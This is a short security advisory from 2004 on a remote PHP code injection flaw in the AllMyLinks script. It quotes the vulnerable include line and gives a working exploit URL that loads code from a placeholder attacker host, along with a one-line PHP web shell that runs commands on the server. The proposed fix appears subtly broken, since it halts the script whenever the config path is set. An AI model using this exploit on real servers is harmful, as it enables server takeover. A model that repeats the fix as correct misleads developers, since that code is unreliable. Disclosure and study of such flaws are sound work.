******** AllMyLinks PHP Code Injection vulnerability ******** Product : AllMyLinks Vendor : www.php-resource.net Date : February 14, 2004 Problem : PHP Code Injection Vendor Contacted ? : No ************************** Source **************************** in /include/footer.inc.php -------------------------------------------------------------- $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); -------------------------------------------------------------- ************************** Exploit *************************** http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://[attacker]/&cmd=uname%20-a in http://[attacker]/include/template.inc.php have : ------------------------ <? system($cmd); ?> ------------------------ ************************** Impact **************************** Malicious user execute arbitrary commands on the server . ************************* Solution *************************** in /include/footer.inc.php replace $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); for if (isset($_AMLconfig['cfg_serverpath'])){ die("Don\'t Hack it :)"); } $AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php"); ************************** Credits **************************** bnfx : bnfx@antisocial.com Mad_Skater : m4dsk4t3r@hotmail.com TechTeam Brazilian Crew .